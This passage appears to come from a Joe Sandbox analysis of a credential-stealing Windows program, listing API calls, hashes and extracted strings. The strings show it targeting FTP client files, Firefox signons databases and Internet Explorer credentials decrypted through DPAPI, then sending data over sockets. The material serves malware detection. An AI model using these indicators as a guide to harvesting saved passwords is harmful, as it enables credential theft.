                                                • Instruction Fuzzy Hash: 8DF03670A40208BAEF117B61CC43F9D7E659F00748F60417BB514B41F1DBB99F519A5C
                                                APIs
                                                • GetHGlobalFromStream.OLE32(00000000,?), ref: 00403DF4
                                                • GlobalLock.KERNEL32(?), ref: 00403E0B
                                                  • Part of subcall function 00403C26: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
                                                • GlobalUnlock.KERNEL32(?), ref: 00403E28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$CrackFromInternetLockStreamUnlock
                                                • String ID:
                                                • API String ID: 1075796459-0
                                                • Opcode ID: 831efcc108d02bad90e9e1e76d0c2f7364eb8ea273fe8039ab1153499a6696f6
                                                • Instruction ID: 0fc2f376dfeef626b66e1d29bc1a390a64e8a5b62cb5dc3ba2aecaad03027e41
                                                • Opcode Fuzzy Hash: 831efcc108d02bad90e9e1e76d0c2f7364eb8ea273fe8039ab1153499a6696f6
                                                • Instruction Fuzzy Hash: 64F0493050010CBBDF01AFA5CC45AEE7F69EB04319F10863AB924A41F1D7B98FA0EB58
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CC7
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                • String ID: \32BitFtp.ini
                                                • API String ID: 2776971706-1260517637
                                                • Opcode ID: c1c9420d2c9bf62fcf05cf12e1ba98b2d6c89d1368bcba0e4347569d0588de16
                                                • Instruction ID: 1d698cb5d94abc71a6ae30598f63509fb673ef8b4ae26f9c95abbd2df378e4bf
                                                • Opcode Fuzzy Hash: c1c9420d2c9bf62fcf05cf12e1ba98b2d6c89d1368bcba0e4347569d0588de16
                                                • Instruction Fuzzy Hash: 09F08271A0010CBAEB20BB61CC42FDE7A299B40348F504437BA04F51E2DABDEB80575D
                                                APIs
                                                • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DA9
                                                • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DB6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateFileHandle
                                                • String ID:
                                                • API String ID: 3498533004-0
                                                • Opcode ID: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
                                                • Instruction ID: 90587616b231e62f0ce0a1ca71656843b80ecc2effe649e52ec39507118c715a
                                                • Opcode Fuzzy Hash: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
                                                • Instruction Fuzzy Hash: 10E04F7235024437EB3115699C83F5A3AC85B11B58F104432B641BD2D1D5E9F9C1466C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: .xml
                                                • API String ID: 1659193697-2937849440
                                                • Opcode ID: f4ee19a40337aae6af9bebaea52dffb814ff37b80b60d162c1506df385f6728c
                                                • Instruction ID: 82dfe2a676b0c618229c0b4738605abde89c85a807fc6a32c104a7e913921a9b
                                                • Opcode Fuzzy Hash: f4ee19a40337aae6af9bebaea52dffb814ff37b80b60d162c1506df385f6728c
                                                • Instruction Fuzzy Hash: BBF03031800108FBDF11AF91CC42DCD7B76AB54318F208566B520B51E0D7B99BA4EB58
                                                APIs
                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401E0D
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401E28
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentExpandLocalStrings$AllocFree
                                                • String ID:
                                                • API String ID: 2376306162-0
                                                • Opcode ID: d1b2027d67d1c4240f6d427ce8b68f1f50c6128f11c33743b5ffd30317e8e35e
                                                • Instruction ID: 24368c84768ad20674b47a6cedeb084af262bdde019d902b2cc9b9c42f429847
                                                • Opcode Fuzzy Hash: d1b2027d67d1c4240f6d427ce8b68f1f50c6128f11c33743b5ffd30317e8e35e
                                                • Instruction Fuzzy Hash: 91E01271A00109FBDF11AAB1CD02FAF7A69AB10388F2045367D14F51F1D7799F50A69C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: gethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 1594361348-0
                                                • Opcode ID: f4fb47d62413f7430a268c9619c83db832305ddf263421df52fa112740a6aecf
                                                • Instruction ID: ba5725e39e640fc153ccdb2a9025af856a0b7f2c782c872154f291422b6e1ce5
                                                • Opcode Fuzzy Hash: f4fb47d62413f7430a268c9619c83db832305ddf263421df52fa112740a6aecf
                                                • Instruction Fuzzy Hash: DAE04F30200505BBCA209E29D8018553A996B123797504B23F130DB3F0D7BADD839B49
                                                APIs
                                                • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
                                                • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: closesocketconnect
                                                • String ID:
                                                • API String ID: 1323028321-0
                                                • Opcode ID: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
                                                • Instruction ID: be6505267f29f4178e4e45716bfd2a082c1c90b363e213ca25923fe40938077a
                                                • Opcode Fuzzy Hash: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
                                                • Instruction Fuzzy Hash: 78D0C9B1A0020879D710DABA5DC29FEA65DAB10328F105E3BB526E12C1E5BDC5845E29
                                                APIs
                                                  • Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756
                                                • recv.WSOCK32(?,?,00000800,00000000), ref: 0040382D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recvselect
                                                • String ID:
                                                • API String ID: 741273618-0
                                                • Opcode ID: de3fe264493f79aaef43602abc316456185a8866abbfc431ee1fb239a53e31dc
                                                • Instruction ID: 323a9da6d9ca5a96abf8ccc2a690c220014aa7d17c9f691bfb2ea616bb951e21
                                                • Opcode Fuzzy Hash: de3fe264493f79aaef43602abc316456185a8866abbfc431ee1fb239a53e31dc
                                                • Instruction Fuzzy Hash: 9F014472600309ABDB10AE6ACC41BAB7FDCBB10346F20C577B911E62C0D778DF559A99
                                                APIs
                                                • send.WSOCK32(?,?,00000000,00000000), ref: 004036EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
                                                • Instruction ID: be9ef6ce2d4025a438cc5a6b6f313f8180328372e462bd93b64e20afe6ef20d9
                                                • Opcode Fuzzy Hash: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
                                                • Instruction Fuzzy Hash: 88F0A072300248EBDB104E55DC40B5B3B58E791369F20443BFA01A73C1D3BAEA918758
                                                APIs
                                                • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: select
                                                • String ID:
                                                • API String ID: 1274211008-0
                                                • Opcode ID: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
                                                • Instruction ID: e8c92696a27f7789f9168a37488be3243172b4df61387a138d61a6e4929c29f7
                                                • Opcode Fuzzy Hash: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
                                                • Instruction Fuzzy Hash: C8F037B551011CAEDB209F14CC51BD9BB78EB14714F1081A1E558E61D0D7F59BC48F55
                                                APIs
                                                • setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID:
                                                • API String ID: 3981526788-0
                                                • Opcode ID: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
                                                • Instruction ID: 9de39b6423a18e4b635914f995573c2f828d2e73ec19ed757491c159e372b79a
                                                • Opcode Fuzzy Hash: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
                                                • Instruction Fuzzy Hash: 9AD0A77054020CB1D710D740CD03EDD72785F00708F108230B750BA1E1E7F55B88934D
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00403E51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
                                                • Instruction ID: 408fbaf15a75b0da35fbc24d3226a342d8ed0cf0f325acef7b37683ef5936850
                                                • Opcode Fuzzy Hash: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
                                                • Instruction Fuzzy Hash: 5FB0923161020836EA10E6958C439DA729D4744748F4001A13A59D12C2EEE5AAC04AEA
                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401016
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateGlobalStream
                                                • String ID:
                                                • API String ID: 2244384528-0
                                                • Opcode ID: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
                                                • Instruction ID: b431a99ddbd6f298bdb6c6cbc4e5d632e74455fe4781730d40ac7f96afd32023
                                                • Opcode Fuzzy Hash: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
                                                • Instruction Fuzzy Hash: 37A0223238020030EE00EB808C83FCE28030B2CB8CF008022B3082C0C0C0FEC0E0C228
                                                APIs
                                                • LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID:
                                                • API String ID: 2826327444-0
                                                • Opcode ID: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
                                                • Instruction ID: 500c98066f7ad2306fab3d815ea7ca12909582ff6fddbe18178bd9c5c23c3a43
                                                • Opcode Fuzzy Hash: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
                                                • Instruction Fuzzy Hash: 42C09B3210060C56DB116F25D949B9E79D4575034CF40C2376D05645B1D6B8D6D0C5D8
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                • Opcode ID: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
                                                • Instruction ID: 0df91a5887059c29a5536f2b37c104e83e237d577eaeef3e17dd13c7587ff9d4
                                                • Opcode Fuzzy Hash: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
                                                • Instruction Fuzzy Hash: 0FB092B124020827E250AA49C803F5A738C9B10B8CF408122BB44A6282C8A8F89042BD
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004096DC
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 00409709
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 00409726
                                                • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098BC
                                                • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098CF
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                • API String ID: 3040542784-1405255088
                                                • Opcode ID: 8ef0bd30fd04ccc02a0c98e2e208e9dec4010ee5d9356605653cd91f4535d2e8
                                                • Instruction ID: c3a02d17520d638cdef0a049c0bca35e5551917b56ae0849102c1ffe2bdac06f
                                                • Opcode Fuzzy Hash: 8ef0bd30fd04ccc02a0c98e2e208e9dec4010ee5d9356605653cd91f4535d2e8
                                                • Instruction Fuzzy Hash: FF516271911109AAEF21BF21CD42AEE7B6AAF41348F10847BB508711F3DB7D8ED09E59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: explorer.exe
                                                • API String ID: 0-3187896405
                                                • Opcode ID: 53999b05d3ebfcf22466a56dc9069ff60c37fa3ad5b4a7ad1a0a153dcaa2926f
                                                • Instruction ID: d74b17844073f6ad73c2ef0740f1ad8b606c63cad5e558ade9292410ef416c20
                                                • Opcode Fuzzy Hash: 53999b05d3ebfcf22466a56dc9069ff60c37fa3ad5b4a7ad1a0a153dcaa2926f
                                                • Instruction Fuzzy Hash: 16311B30904219ABEB21AF65DE89BEE7AB4BB04304F1041B7E515B11E1DBB89FC5CE19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $123456
                                                • API String ID: 0-521589362
                                                • Opcode ID: fd853e0a5e10fc8e3b9843264a2a8354f495f8006752088b2b27e88e418dc1b7
                                                • Instruction ID: 78c51aa61b9f298970356f298b49bb9ccc83472d8004ff69d171fc0def4cdeb3
                                                • Opcode Fuzzy Hash: fd853e0a5e10fc8e3b9843264a2a8354f495f8006752088b2b27e88e418dc1b7
                                                • Instruction Fuzzy Hash: 12513C75900208EBEF119FA1DD45BDEBF75EB04304F548066E504A91A2D7FE8AC4DB28
                                                APIs
                                                  • Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
                                                  • Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A3C5
                                                • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A44F
                                                • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A46E
                                                • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A48D
                                                • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A4A6
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A4EC
                                                • LocalFree.KERNEL32(?), ref: 0040A519
                                                • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A543
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                • API String ID: 2957877119-3076635702
                                                • Opcode ID: 628dcc5975db115a4b437a74713bac74da5025d16274bd754d5c749705ce595c
                                                • Instruction ID: 8a3d0d4347acad4b0b1021bdaf5da09c6d4d834d08eecca3032b506426e80688
                                                • Opcode Fuzzy Hash: 628dcc5975db115a4b437a74713bac74da5025d16274bd754d5c749705ce595c
                                                • Instruction Fuzzy Hash: C0412A7290021CAADF219F50CC42FD97AB9BF04304F0484E9F64475090DBB99AE59FD9
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BB18
                                                • LocalFree.KERNEL32(00000000,?), ref: 0040BB53
                                                • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB94
                                                • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA2
                                                • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBB0
                                                • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBBE
                                                • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBCC
                                                • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                • String ID: ftp://$http://$https://
                                                • API String ID: 3968356742-2804853444
                                                • Opcode ID: 42abdbd7ac9c4f3a616ab5156f2668bfe113570481195958dbe35809a0e690ed
                                                • Instruction ID: 49192131c74e6ecdd2ef0c7c9bbab6257bdf88749b5c52d7cb57f463f4db32fe
